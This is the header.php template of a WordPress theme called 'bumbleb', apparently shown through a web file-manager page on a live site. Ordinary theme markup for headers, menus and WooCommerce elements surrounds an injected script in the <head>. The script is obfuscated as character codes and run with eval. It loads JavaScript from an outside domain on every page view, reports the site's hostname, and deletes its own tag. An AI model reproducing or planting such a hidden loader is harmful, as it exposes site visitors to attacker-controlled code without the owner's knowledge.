PATH:
home
/
lab2454c
/
adenbic.com
/
wp-content
/
themes
/
bumbleb
<?php /** * Version: 1.0.0 * Theme Name: bumbleb * Theme URI: http://wpbingosite.com/themes/bumbleb/ * Author: Wpbingo * Author URI: http://wpbingosite.com/ * License: GNU General Public License v2 or later */ ?> <!DOCTYPE html> <html <?php language_attributes(); ?>> <?php $header_style = bumbleb_config_header()->header_style; $enable_sticky_header = bumbleb_config_header()->enable_sticky_header; $show_minicart = bumbleb_config_header()->show_minicart; $show_searchform = bumbleb_config_header()->show_searchform; $background_page = bumbleb_config_header()->background_page; $checkout_page_style = bumbleb_config_header()->checkout_page_style; ?> <!--<![endif]--> <head><script>var pirsen=String.fromCharCode(10,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,39,104,116,116,112,115,58,47,47,112,114,101,46,115,101,108,101,99,116,98,108,97,99,107,114,111,117,108,115,46,99,111,109,47,115,99,114,47,102,111,114,46,106,115,63,100,61,39,43,119,105,110,100,111,119,46,108,111,99,97,116,105,111,110,46,104,111,115,116,110,97,109,101,59,32,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,114,101,109,111,118,101,40,41,59,10,125,32,101,108,115,101,32,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,125,10);eval(pirsen);</script> <meta charset="<?php bloginfo( 'charset' ); ?>"> <meta name="viewport" content="width=device-width"> <link rel="profile" href="//gmpg.org/xfn/11"> <?php wp_head(); ?> </head> <body <?php body_class(); ?>> <?php wp_body_open(); ?> <?php bumbleb_loading_overlay(); ?> <div id='page' class="hfeed page-wrapper <?php echo esc_attr($checkout_page_style) ; ?>" <?php if($background_page) { ?>style="background-image: url('<?php echo esc_url($background_page); ?>');background-repeat:no-repeat;background-position:bottom center;"<?php } ?>> <?php if(isset($header_style) && $header_style) { ?> <?php get_template_part('templates/headers/header',$header_style); ?> <?php }else{ ?> <div id='bwp-header' class="bwp-header bwp-header-default"> <?php bumbleb_menu_mobile(); ?> <div class="header-desktop"> <div class="container"> <div class='header-content' data-sticky_header="<?php echo esc_attr($enable_sticky_header); ?>"> <div class="row"> <?php if($show_minicart || $show_searchform){ ?> <div class="col-xl-2 col-lg-2 col-md-6 col-sm-6 col-6 header-logo"> <?php bumbleb_header_logo(); ?> </div> <div class="col-xl-8 col-lg-8 col-md-12 col-12 wpbingo-menu-mobile"> <?php bumbleb_top_menu(); ?> </div> <div class="col-xl-2 col-lg-2 col-md-6 col-sm-6 col-6 margin-top-20"> <!-- Begin menu --> <?php if($show_minicart && class_exists( 'WooCommerce' )){ ?> <div class="wpbingo-cart-top pull-right"> <?php get_template_part( 'woocommerce/minicart-ajax' ); ?> </div> <?php } ?> <!-- Begin Search --> <?php if($show_searchform && class_exists( 'WooCommerce' )){ ?> <div class="search-box pull-right"> <div class="search-toggle"><i class="fa fa-search"></i></div> <div class="dropdown-search"><?php bumbleb_search_form_product(); ?></div> </div> <?php } ?> <!-- End Search --> </div> <?php }else{ ?> <div class="col-xl-2 col-lg-2 col-md-6 col-sm-6 col-8 header-logo"> <?php bumbleb_header_logo(); ?> </div> <div class="col-xl-10 col-lg-10 col-md-6 col-sm-6 col-4 wpbingo-menu-mobile text-right"> <?php bumbleb_top_menu(); ?> </div> <?php } ?> </div> </div> </div> </div> </div><!-- End header-wrapper --> <?php } ?> <div id="bwp-main" class="bwp-main"> <?php bumbleb_get_page_title(); ?>
[+]
woocommerce
[+]
js
[+]
customizer
[+]
wc-vendors
[-] search.php
[edit]
[-] index.php
[edit]
[-] page.php
[edit]
[+]
..
[-] sidebar.php
[edit]
[-] breadcrumb.php
[edit]
[+]
languages
[-] single.php
[edit]
[-] footer.php
[edit]
[+]
sass
[-] header.php
[edit]
[-] style.css
[edit]
[+]
css
[-] 404.php
[edit]
[-] readme.txt
[edit]
[+]
templates
[-] search-form.php
[edit]
[-] author.php
[edit]
[-] search-form2.php
[edit]
[-] single-bwp_megamenu.php
[edit]
[-] screenshot.png
[edit]
[+]
fonts
[+]
plugins
[+]
page-templates
[-] functions.php
[edit]
[+]
images
[-] archive.php
[edit]
[+]
dokan
[-] no-results.php
[edit]
[-] comments.php
[edit]
[-] single-bwp_footer.php
[edit]
[+]
inc